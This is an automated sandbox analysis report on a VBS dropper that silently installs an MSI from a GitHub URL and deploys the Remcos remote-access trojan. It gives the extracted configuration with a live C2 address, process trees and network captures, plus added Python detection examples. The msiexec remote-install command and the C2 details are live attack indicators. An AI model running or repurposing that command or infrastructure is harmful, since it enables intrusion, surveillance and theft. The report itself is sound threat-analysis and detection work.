Analysis

  • max time kernel
    148s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250129-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20250129-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    30/01/2025, 20:07 UTC

General

  • Target

    secondaryTask.vbs

  • Size

    512B

  • MD5

    bcc1d6a3c9aeec994cd31f86ada37ae6

  • SHA1

    0b7bb7af96d842cfbb7a89793a4292fec4289a8c

  • SHA256

    41590f3a8ba3c910f11fd5fa095856d5bc556f20fa4fd6d269aa1be4e08b4c64

  • SHA512

    8793e62dc4a9465ef5254e15b3471573a242705dfdf74bd3d09d97c10dd84daf69aa8c0b5c9bc3c5a7302e431fc2ed417b1e6c194da106765e50ad385ea955b7

Malware Config

Extracted

Family

remcos

Botnet

v2

C2

185.157.162.126:1995

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    qsdazeazd-EL00KX

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Detects HijackLoader (aka IDAT Loader) 1 IoCs
  • HijackLoader

    HijackLoader is a multistage loader first seen in 2023.

  • Hijackloader family
  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 7 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 8 IoCs
  • Drops file in Windows directory 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\secondaryTask.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1524
    • C:\Windows\System32\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i "https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi" /qn
      2⤵
      • Use of msiexec (install) with remote resource
      • Enumerates connected drives
      • Suspicious use of AdjustPrivilegeToken
      PID:4388
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2712
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 06E6160C25342A676FC4AA7A4DADC80C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:4476
    • C:\Program Files (x86)\Common Files\PackagerUpdt\EHttpSrv.exe
      "C:\Program Files (x86)\Common Files\PackagerUpdt\EHttpSrv.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:4136
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\SysWOW64\cmd.exe
        3⤵
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:5116
        • C:\Program Files (x86)\Common Files\PackagerUpdt\EHttpSrv.exe
          "C:\Program Files (x86)\Common Files\PackagerUpdt\EHttpSrv.exe"
          4⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:432
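
The process tree above is the whole story of the first stage: a script host launches msiexec against an https URL with the UI suppressed, the installer service then runs the dropped EHttpSrv.exe from a "Common Files" folder, and that binary relaunches itself through cmd.exe (the SetThreadContext / MapViewOfSection signatures on those PIDs). The following is an added example, not part of the tria.ge report, that shows how to pick each of those three links out of process-creation telemetry. EVENTS is constructed from the command lines and PIDs listed above; the parent PIDs of WScript.exe (900) and of the msiexec service (700) and the field names pid/ppid/image/cmdline are assumptions, not a real EDR schema.

```python
"""Triage a WScript -> msiexec (remote MSI) -> dropped-EXE process chain.

Added example, not from the tria.ge report. EVENTS is constructed from the
Processes section; ppids 900 and 700 and the field names are assumptions.
"""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
# msiexec /i, /a or /package followed by an http(s) URL instead of a local path
MSI_REMOTE = re.compile(r'(?i)\s/(?:i|a|package)\s+"?(https?://[^\s"]+)"?')
# /q, /qn, /qb or /quiet suppress the installer UI
MSI_QUIET = re.compile(r"(?i)\s/(?:q[nb]?|quiet)(?=\s|$)")


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str

    @property
    def name(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()


def find_remote_msi(events):
    """(event, url, quiet) for every msiexec launched against a URL."""
    hits = []
    for ev in events:
        if ev.name != "msiexec.exe":
            continue
        m = MSI_REMOTE.search(ev.cmdline)
        if m:
            hits.append((ev, m.group(1), bool(MSI_QUIET.search(ev.cmdline))))
    return hits


def script_host_parent(events, child):
    """The wscript/cscript/mshta/powershell parent of `child`, or None."""
    by_pid = {e.pid: e for e in events}
    parent = by_pid.get(child.ppid)
    return parent if parent and parent.name in SCRIPT_HOSTS else None


def self_respawn_via_cmd(events):
    """Chains A -> cmd.exe -> A (same image), the pattern EHttpSrv.exe shows.
    Returns (grandparent, cmd, child) triples."""
    by_pid = {e.pid: e for e in events}
    chains = []
    for ev in events:
        cmd = by_pid.get(ev.ppid)
        if not cmd or cmd.name != "cmd.exe":
            continue
        grand = by_pid.get(cmd.ppid)
        if grand and grand.image.lower() == ev.image.lower():
            chains.append((grand, cmd, ev))
    return chains


# Constructed from the report's process list (ppids 900/700 are assumed).
EVENTS = [
    ProcEvent(1524, 900, r"C:\Windows\System32\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\secondaryTask.vbs"'),
    ProcEvent(4388, 1524, r"C:\Windows\System32\msiexec.exe",
              r'"C:\Windows\System32\msiexec.exe" /i "https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi" /qn'),
    ProcEvent(2712, 700, r"C:\Windows\system32\msiexec.exe", r"C:\Windows\system32\msiexec.exe /V"),
    ProcEvent(4476, 2712, r"C:\Windows\syswow64\MsiExec.exe",
              r"C:\Windows\syswow64\MsiExec.exe -Embedding 06E6160C25342A676FC4AA7A4DADC80C"),
    ProcEvent(4136, 2712, r"C:\Program Files (x86)\Common Files\PackagerUpdt\EHttpSrv.exe",
              r'"C:\Program Files (x86)\Common Files\PackagerUpdt\EHttpSrv.exe"'),
    ProcEvent(5116, 4136, r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\cmd.exe"),
    ProcEvent(432, 5116, r"C:\Program Files (x86)\Common Files\PackagerUpdt\EHttpSrv.exe",
              r'"C:\Program Files (x86)\Common Files\PackagerUpdt\EHttpSrv.exe"'),
]

if __name__ == "__main__":
    for ev, url, quiet in find_remote_msi(EVENTS):
        parent = script_host_parent(EVENTS, ev)
        print(f"pid {ev.pid}: remote MSI {url} quiet={quiet} "
              f"parent={parent.name if parent else ev.ppid}")
    for grand, cmd, child in self_respawn_via_cmd(EVENTS):
        print(f"self-respawn: {grand.pid} -> {cmd.pid} -> {child.pid} ({child.name})")
```

The msiexec service instance (`/V`) and the `-Embedding` custom-action host are deliberately left unflagged: only the user-launched `/i <URL> /qn` line carries the remote resource, and its parent being a script host is what turns a single odd install into a phishing chain worth escalating.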

Network

  • flag-us
    DNS
    github.com
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    github.com
    IN A
    Response
    github.com
    IN A
    20.26.156.215
  • flag-gb
    GET
    https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi
    msiexec.exe
    Remote address:
    20.26.156.215:443
    Request
    GET /Kroby5444/Jim/raw/refs/heads/main/Slf.msi HTTP/2.0
    host: github.com
    accept: */*
    user-agent: Windows Installer
    Response
    HTTP/2.0 302
    server: GitHub.com
    date: Thu, 30 Jan 2025 20:07:07 GMT
    content-type: text/html; charset=utf-8
    vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
    access-control-allow-origin:
    location: https://raw.githubusercontent.com/Kroby5444/Jim/refs/heads/main/Slf.msi
    cache-control: no-cache
    strict-transport-security: max-age=31536000; includeSubdomains; preload
    x-frame-options: deny
    x-content-type-options: nosniff
    x-xss-protection: 0
    referrer-policy: no-referrer-when-downgrade
    content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
    content-length: 0
    x-github-request-id: FB8C:25D712:5DED1:764C9:679BDBF0
  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dns.google
  • flag-us
    DNS
    raw.githubusercontent.com
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    raw.githubusercontent.com
    IN A
    Response
    raw.githubusercontent.com
    IN A
    185.199.108.133
    raw.githubusercontent.com
    IN A
    185.199.111.133
    raw.githubusercontent.com
    IN A
    185.199.109.133
    raw.githubusercontent.com
    IN A
    185.199.110.133
  • flag-us
    GET
    https://raw.githubusercontent.com/Kroby5444/Jim/refs/heads/main/Slf.msi
    msiexec.exe
    Remote address:
    185.199.108.133:443
    Request
    GET /Kroby5444/Jim/refs/heads/main/Slf.msi HTTP/2.0
    host: raw.githubusercontent.com
    accept: */*
    user-agent: Windows Installer
    Response
    HTTP/2.0 200
    cache-control: max-age=300
    content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    content-type: application/octet-stream
    etag: "15069df03d703864669c54ef87b4b9e9ce3bc9be8473953fff33c706eb25c2a6"
    strict-transport-security: max-age=31536000
    x-content-type-options: nosniff
    x-frame-options: deny
    x-xss-protection: 1; mode=block
    x-github-request-id: 6922:2450AD:B049:E320:679BD92F
    accept-ranges: bytes
    date: Thu, 30 Jan 2025 20:07:13 GMT
    via: 1.1 varnish
    x-served-by: cache-lcy-eglc8600034-LCY
    x-cache: HIT
    x-cache-hits: 0
    x-timer: S1738267633.227390,VS0,VE80
    vary: Authorization,Accept-Encoding,Origin
    access-control-allow-origin: *
    cross-origin-resource-policy: cross-origin
    x-fastly-request-id: 3086e3e7d73d18d16c940bde9e2313d9c9209a7c
    expires: Thu, 30 Jan 2025 20:12:13 GMT
    source-age: 0
    content-length: 4502528
  • flag-us
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.ax-0001.ax-msedge.net
    g-bing-com.ax-0001.ax-msedge.net
    IN CNAME
    ax-0001.ax-msedge.net
    ax-0001.ax-msedge.net
    IN A
    150.171.27.10
    ax-0001.ax-msedge.net
    IN A
    150.171.28.10
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=db4f4f043a6942a3a1fdab65b84b97a4&localId=w:29A35C3D-9BC5-AEFB-2396-56CCD722C64D&deviceId=6755477840987139&anid=
    Remote address:
    150.171.27.10:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=db4f4f043a6942a3a1fdab65b84b97a4&localId=w:29A35C3D-9BC5-AEFB-2396-56CCD722C64D&deviceId=6755477840987139&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=308BFE8CEBD069C93E15EB08EA4F68D1; domain=.bing.com; expires=Tue, 24-Feb-2026 20:07:13 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 26B6CEAE85484139B9315A18C42277AD Ref B: LON601060103052 Ref C: 2025-01-30T20:07:13Z
    date: Thu, 30 Jan 2025 20:07:13 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=db4f4f043a6942a3a1fdab65b84b97a4&localId=w:29A35C3D-9BC5-AEFB-2396-56CCD722C64D&deviceId=6755477840987139&anid=
    Remote address:
    150.171.27.10:443
    Request
    GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=db4f4f043a6942a3a1fdab65b84b97a4&localId=w:29A35C3D-9BC5-AEFB-2396-56CCD722C64D&deviceId=6755477840987139&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=308BFE8CEBD069C93E15EB08EA4F68D1
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=eqY_vqmslE3OURdyCGLPj_ygsfad2NdFGwfg29CoFU4; domain=.bing.com; expires=Tue, 24-Feb-2026 20:07:14 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: AE8A5A1A37ED4DE7A084E52B9FC6A1C5 Ref B: LON601060103052 Ref C: 2025-01-30T20:07:14Z
    date: Thu, 30 Jan 2025 20:07:13 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=db4f4f043a6942a3a1fdab65b84b97a4&localId=w:29A35C3D-9BC5-AEFB-2396-56CCD722C64D&deviceId=6755477840987139&anid=
    Remote address:
    150.171.27.10:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=db4f4f043a6942a3a1fdab65b84b97a4&localId=w:29A35C3D-9BC5-AEFB-2396-56CCD722C64D&deviceId=6755477840987139&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=308BFE8CEBD069C93E15EB08EA4F68D1; MSPTC=eqY_vqmslE3OURdyCGLPj_ygsfad2NdFGwfg29CoFU4
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 16AB399D154F483E96731721CB0CF9D2 Ref B: LON601060103052 Ref C: 2025-01-30T20:07:14Z
    date: Thu, 30 Jan 2025 20:07:13 GMT
  • flag-us
    DNS
    215.156.26.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    215.156.26.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    72.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    72.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    133.108.199.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.108.199.185.in-addr.arpa
    IN PTR
    Response
    133.108.199.185.in-addr.arpa
    IN PTR
    cdn-185-199-108-133.github.com
  • flag-us
    DNS
    133.130.81.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.130.81.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    5.114.82.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    5.114.82.104.in-addr.arpa
    IN PTR
    Response
    5.114.82.104.in-addr.arpa
    IN PTR
    a104-82-114-5.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    43.58.199.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    43.58.199.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    18.31.95.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.31.95.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    212.20.149.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    212.20.149.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    126.162.157.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    126.162.157.185.in-addr.arpa
    IN PTR
    Response
    126.162.157.185.in-addr.arpa
    IN PTR
    185-157-162-126.pool.ovpn.com
  • flag-us
    DNS
    13.153.16.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.153.16.2.in-addr.arpa
    IN PTR
    Response
    13.153.16.2.in-addr.arpa
    IN PTR
    a2-16-153-13.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    22.236.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.236.111.52.in-addr.arpa
    IN PTR
    Response
  • 20.26.156.215:443
    https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi
    tls, http2
    msiexec.exe
    1.1kB
    7.8kB
    14
    12

    HTTP Request

    GET https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi

    HTTP Response

    302
  • 185.199.108.133:443
    https://raw.githubusercontent.com/Kroby5444/Jim/refs/heads/main/Slf.msi
    tls, http2
    msiexec.exe
    137.4kB
    4.7MB
    2608
    3355

    HTTP Request

    GET https://raw.githubusercontent.com/Kroby5444/Jim/refs/heads/main/Slf.msi

    HTTP Response

    200
  • 150.171.27.10:443
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=db4f4f043a6942a3a1fdab65b84b97a4&localId=w:29A35C3D-9BC5-AEFB-2396-56CCD722C64D&deviceId=6755477840987139&anid=
    tls, http2
    2.0kB
    9.3kB
    22
    18

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=db4f4f043a6942a3a1fdab65b84b97a4&localId=w:29A35C3D-9BC5-AEFB-2396-56CCD722C64D&deviceId=6755477840987139&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=db4f4f043a6942a3a1fdab65b84b97a4&localId=w:29A35C3D-9BC5-AEFB-2396-56CCD722C64D&deviceId=6755477840987139&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=db4f4f043a6942a3a1fdab65b84b97a4&localId=w:29A35C3D-9BC5-AEFB-2396-56CCD722C64D&deviceId=6755477840987139&anid=

    HTTP Response

    204
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    2.2kB
    1.4kB
    11
    14
  • 8.8.8.8:53
    github.com
    dns
    msiexec.exe
    56 B
    72 B
    1
    1

    DNS Request

    github.com

    DNS Response

    20.26.156.215

  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
    90 B
    1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    raw.githubusercontent.com
    dns
    msiexec.exe
    71 B
    135 B
    1
    1

    DNS Request

    raw.githubusercontent.com

    DNS Response

    185.199.108.133
    185.199.111.133
    185.199.109.133
    185.199.110.133

  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
    148 B
    1
    1

    DNS Request

    g.bing.com

    DNS Response

    150.171.27.10
    150.171.28.10

  • 8.8.8.8:53
    215.156.26.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    215.156.26.20.in-addr.arpa

  • 8.8.8.8:53
    72.32.126.40.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    72.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    133.108.199.185.in-addr.arpa
    dns
    74 B
    118 B
    1
    1

    DNS Request

    133.108.199.185.in-addr.arpa

  • 8.8.8.8:53
    133.130.81.91.in-addr.arpa
    dns
    72 B
    147 B
    1
    1

    DNS Request

    133.130.81.91.in-addr.arpa

  • 8.8.8.8:53
    5.114.82.104.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    5.114.82.104.in-addr.arpa

  • 8.8.8.8:53
    43.58.199.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    43.58.199.20.in-addr.arpa

  • 8.8.8.8:53
    18.31.95.13.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    18.31.95.13.in-addr.arpa

  • 8.8.8.8:53
    212.20.149.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    212.20.149.52.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    126.162.157.185.in-addr.arpa
    dns
    74 B
    117 B
    1
    1

    DNS Request

    126.162.157.185.in-addr.arpa

  • 8.8.8.8:53
    13.153.16.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    13.153.16.2.in-addr.arpa

  • 8.8.8.8:53
    172.214.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.214.232.199.in-addr.arpa

  • 8.8.8.8:53
    22.236.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    22.236.111.52.in-addr.arpa
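
Three things in the network capture above are worth turning into reusable checks: the payload is fetched with the "Windows Installer" user agent (msiexec's own), it walks a 302 from github.com to raw.githubusercontent.com (the "legitimate hosting services abused" signature), and the only flow from the dropped EHttpSrv.exe is TLS to 185.157.162.126 on port 1995, matching the extracted Remcos C2. The following is an added example, not part of the tria.ge report, that applies those checks to proxy-style flow records. FLOWS is constructed from the exchanges listed above (same URLs, hosts, ports, user agents and status codes; the bing.com URL is trimmed to its path); the Flow record layout is an assumed schema, not a real proxy or NetFlow format.

```python
"""Triage HTTP/TLS flows around an msiexec-fetched MSI and a Remcos C2 session.

Added example, not from the tria.ge report. FLOWS is constructed from the
Network section; the Flow layout is an assumed schema.
"""
from dataclasses import dataclass
from urllib.parse import urlparse

INSTALLER_UA = "Windows Installer"   # user agent msiexec sends
# Public code-hosting hosts routinely abused for payload staging
CODE_HOSTING = {"github.com", "raw.githubusercontent.com", "objects.githubusercontent.com"}
COMMON_TLS_PORTS = {443, 8443}


@dataclass(frozen=True)
class Flow:
    proto: str                 # "http" or "tls"
    process: str               # empty when the sensor did not attribute it
    dst: str
    port: int
    url: str = ""
    user_agent: str = ""
    status: int = 0
    location: str = ""         # Location header when status is a redirect


def follow_redirects(flows, start_url, max_hops=5):
    """Walk an HTTP redirect chain from start_url; returns [(url, status), ...]."""
    by_url = {f.url: f for f in flows if f.proto == "http"}
    chain, url = [], start_url
    for _ in range(max_hops):
        f = by_url.get(url)
        if f is None:
            break
        chain.append((url, f.status))
        if 300 <= f.status < 400 and f.location:
            url = f.location
        else:
            break
    return chain


def installer_fetches_from_code_hosting(flows):
    """msiexec (Windows Installer UA) pulling an .msi from a code-hosting site."""
    hits = []
    for f in flows:
        if f.proto != "http" or f.user_agent != INSTALLER_UA:
            continue
        u = urlparse(f.url)
        if (u.hostname or "") in CODE_HOSTING and u.path.lower().endswith(".msi"):
            hits.append(f)
    return hits


def tls_on_unusual_port(flows):
    """TLS sessions to ports other than the usual HTTPS ports, e.g. Remcos on 1995."""
    return [f for f in flows if f.proto == "tls" and f.port not in COMMON_TLS_PORTS]


MSI_URL = "https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi"
RAW_URL = "https://raw.githubusercontent.com/Kroby5444/Jim/refs/heads/main/Slf.msi"
BING_URL = "https://g.bing.com/neg/0"   # query string trimmed; benign shell telemetry

# Constructed from the report's Network section.
FLOWS = [
    Flow("http", "msiexec.exe", "20.26.156.215", 443, MSI_URL, INSTALLER_UA, 302, RAW_URL),
    Flow("http", "msiexec.exe", "185.199.108.133", 443, RAW_URL, INSTALLER_UA, 200),
    Flow("http", "", "150.171.27.10", 443, BING_URL, "WindowsShellClient/9.0.40929.0 (Windows)", 204),
    Flow("tls", "EHttpSrv.exe", "185.157.162.126", 1995),
]

if __name__ == "__main__":
    for url, status in follow_redirects(FLOWS, MSI_URL):
        print(f"{status} {url}")
    for f in installer_fetches_from_code_hosting(FLOWS):
        print(f"installer fetch: {f.process} -> {f.url}")
    for f in tls_on_unusual_port(FLOWS):
        print(f"odd TLS port: {f.process} -> {f.dst}:{f.port}")
```

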